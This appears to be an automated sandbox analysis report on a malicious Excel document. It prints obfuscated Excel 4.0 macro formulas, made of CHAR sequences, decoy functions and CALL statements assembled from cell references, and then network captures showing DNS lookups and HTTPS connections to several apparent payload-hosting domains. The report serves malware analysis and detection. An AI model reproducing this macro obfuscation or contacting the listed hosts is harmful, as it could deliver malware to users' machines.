,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(85),,,,=CHAR(74),,=CHAR(114),,=CHAR(44),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(82),,,,=CHAR(74),,=CHAR(117),,=CHAR(68),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(76),,,,=CHAR(67),,=CHAR(110),,=CHAR(108),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(77),,,,=CHAR(67),,=CHAR(100),,=CHAR(108),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)",,,,,,=CHAR(111),,,,=CHAR(66),,=CHAR(108),,=CHAR(82),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(110),,,,=CHAR(66),,=CHAR(108),,=CHAR(101),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(51),,=CHAR(103),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(105),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(115),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(116),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=CALL(""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&'""''  ds                       ''d'!AL5&'""''  ds                       ''d'!AL6&'""''  ds                       ''d'!AL7&'""''  ds                       ''d'!AL8&'""''  ds                       ''d'!AL9&'""''  ds                       ''d'!AL10&'""''  ds                       ''d'!AL11&'""''  ds                       ''d'!AL12&'""''  ds                       ''d'!AL13&'""''  ds                       ''d'!AL14&'""''  ds                       ''d'!AL15&'""''  ds                       ''d'!AL16&'""''  ds                       ''d'!AL17&'""''  ds                       ''d'!AL18&'DiNDoie    ""`block`'' target  - '!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.0.sheet!BU32&'""''  ds                       ''d'!A100&'DiNDoie    ""`block`'' target  - '!A200&'DiNDoie    ""`block`'' target  - '!C200,'DiNDoie    ""`block`'' target  - '!E201,0,0)",,,,,,,,,,,,,,=CHAR(101),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&'""''  ds                       ''d'!AL5&'""''  ds                       ''d'!AL6&'""''  ds                       ''d'!AL7&'""''  ds            

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Apr 7, 2021 07:47:04.912156105 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.056375027 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.056651115 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.058928967 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.203022003 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243632078 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243673086 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243714094 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243839979 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243920088 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.257091045 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.402527094 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.402820110 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.403069973 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.404061079 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:05.589296103 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.425168991 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.425461054 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:06.426013947 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.426143885 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:06.428239107 CEST49709443192.168.2.3108.167.180.111
                                                                                                                                                                                        Apr 7, 2021 07:47:06.495124102 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.530004978 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.530333996 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.531985998 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.566447020 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572087049 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572130919 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572163105 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572216034 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572247982 CEST44349709108.167.180.111192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572295904 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.589226007 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.639961004 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.640105009 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.641880035 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:06.717202902 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213040113 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213085890 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213124037 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213160038 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213196993 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213196039 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213233948 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213268042 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213272095 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213275909 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213303089 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213314056 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213361025 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.213366032 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336600065 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336647987 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336694002 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336708069 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336770058 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336783886 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336796999 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336884975 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336913109 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.336952925 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337505102 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337585926 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337626934 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337651968 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337662935 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337718964 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337738991 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337799072 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337821007 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337882042 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337907076 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337960005 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.337973118 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.338006020 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.338021994 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.338038921 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.338076115 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.338094950 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373416901 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373476028 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373516083 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373519897 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373553038 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373555899 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373573065 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373613119 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373617887 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373666048 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373699903 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373739004 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373756886 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373774052 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373794079 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373835087 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373951912 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.373991966 CEST443497115.100.152.162192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.374011040 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.374048948 CEST49711443192.168.2.35.100.152.162
                                                                                                                                                                                        Apr 7, 2021 07:47:07.375561953 CEST443497115.100.152.162192.168.2.3

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Apr 7, 2021 07:46:54.482225895 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:46:54.494839907 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:46:58.039613962 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:46:58.052618980 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:00.269196033 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:00.282951117 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:00.973018885 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:00.985675097 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:01.308897018 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:01.361179113 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:01.687931061 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:01.701493025 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:02.703156948 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:02.717145920 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:03.724719048 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:03.738400936 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:04.668005943 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:04.680447102 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:04.764103889 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:04.906847954 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.431065083 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:05.443871975 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:05.718888998 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:05.732434034 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:06.451692104 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:06.484504938 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.176928997 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:07.189754963 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:07.520457029 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:07.533926010 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:08.149755001 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:08.163930893 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:08.334104061 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:08.380784035 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:08.791898966 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:08.932782888 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:08.938950062 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:08.944602966 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:09.734869003 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:09.747687101 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:12.507849932 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:12.520634890 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:13.679682970 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:13.692511082 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:14.561901093 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:14.575109005 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:15.528862953 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:15.541953087 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:16.283705950 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:16.296487093 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:21.136024952 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:21.149027109 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:30.107182026 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:30.125471115 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:30.572249889 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:30.584811926 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:31.379554033 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:31.392307997 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:32.375207901 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:32.388556957 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:33.169199944 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:33.892467022 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:33.910248995 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:34.177881002 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:34.190310955 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:43.891092062 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:43.909801960 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:49.905451059 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:49.940437078 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:55.938344002 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:55.950835943 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:47:59.105659008 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:47:59.124231100 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:48:34.984508991 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:48:34.997838974 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:48:36.088233948 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:48:36.114710093 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                        Apr 7, 2021 07:49:44.964705944 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                        Apr 7, 2021 07:49:45.015402079 CEST53649108.8.8.8192.168.2.3

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                        Apr 7, 2021 07:47:04.764103889 CEST192.168.2.38.8.8.80x570Standard query (0)ethereality.infoA (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:06.451692104 CEST192.168.2.38.8.8.80xee19Standard query (0)thefamouscurrybazaar.co.ukA (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:07.520457029 CEST192.168.2.38.8.8.80x1cfbStandard query (0)devrongolf.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:08.334104061 CEST192.168.2.38.8.8.80xe622Standard query (0)ponchokhana.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:08.791898966 CEST192.168.2.38.8.8.80x1062Standard query (0)springbedspetroleum.comA (IP address)IN (0x0001)

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                        Apr 7, 2021 07:47:04.906847954 CEST8.8.8.8192.168.2.30x570No error (0)ethereality.info108.167.180.111A (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:06.484504938 CEST8.8.8.8192.168.2.30xee19No error (0)thefamouscurrybazaar.co.uk5.100.152.162A (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:07.533926010 CEST8.8.8.8192.168.2.30x1cfbNo error (0)devrongolf.com43.229.135.209A (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:08.380784035 CEST8.8.8.8192.168.2.30xe622No error (0)ponchokhana.com5.100.155.169A (IP address)IN (0x0001)
                                                                                                                                                                                        Apr 7, 2021 07:47:08.938950062 CEST8.8.8.8192.168.2.30x1062No error (0)springbedspetroleum.com50.116.95.68A (IP address)IN (0x0001)

                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                        Apr 7, 2021 07:47:05.243714094 CEST108.167.180.111443192.168.2.349709CN=webmail.ethereality.info CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 14:03:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 15:03:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                        Apr 7, 2021 07:47:06.572163105 CEST5.100.152.162443192.168.2.349711CN=www.thefamouscurrybazaar.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 18 22:33:38 CET 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 16 23:33:38 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                        Apr 7, 2021 07:47:07.924719095 CEST43.229.135.209443192.168.2.349713CN=devrongolf.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Mar 20 17:11:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Jun 18 18:11:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
